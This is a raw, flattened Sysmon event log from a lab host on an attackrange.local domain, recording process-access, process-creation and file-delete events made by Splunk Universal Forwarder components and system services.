07:52:24.803{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807558Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.803{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807557Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.803{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807556Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.803{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F4B8-60EB-7479-00000000D001}2332C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807555Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.803{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F4B8-60EB-7479-00000000D001}2332C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807554Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.804{0C1E0330-F4B8-60EB-7479-00000000D001}2332C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000807553Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.460{0C1E0330-F4B8-60EB-7379-00000000D001}1081900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807552Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.303{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F4B8-60EB-7379-00000000D001}108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807551Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.288{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807550Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.288{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807549Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.288{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807548Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.288{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807547Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.288{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807546Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.288{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807545Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.288{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807544Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.288{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807543Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.288{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807542Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.288{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F4B8-60EB-7379-00000000D001}108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807541Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.288{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F4B8-60EB-7379-00000000D001}108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807540Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.273{0C1E0330-F4B8-60EB-7379-00000000D001}108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000807583Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:25.632{0C1E0330-F4B9-60EB-7579-00000000D001}3408172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000807582Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:25.507{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=92708BF4F1E2A2F8720BF51F039B46F1,SHA256=5CEA1492B5CFEE687E8355BF687EE6466E2CCFA3DBB689A59E54D00A2E411D4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807581Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:25.507{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31ECAC0EAB432FB89E1A409E4214C5A8,SHA256=12FE93C8792C1B3049176CB4647AE41F3FCA397FE50A80783B89B57197E35C52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807580Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:25.507{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=68D0C7FC4FD54187DF19867D72E4513D,SHA256=EC9AC3541D8BAE625A20C0283C0754D36A9D9EA49D1A3C0F854E9D90269A9F6E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807579Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:25.507{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F4B9-60EB-7579-00000000D001}3408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807578Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:25.507{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807577Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:25.507{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807576Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:25.491{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807575Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 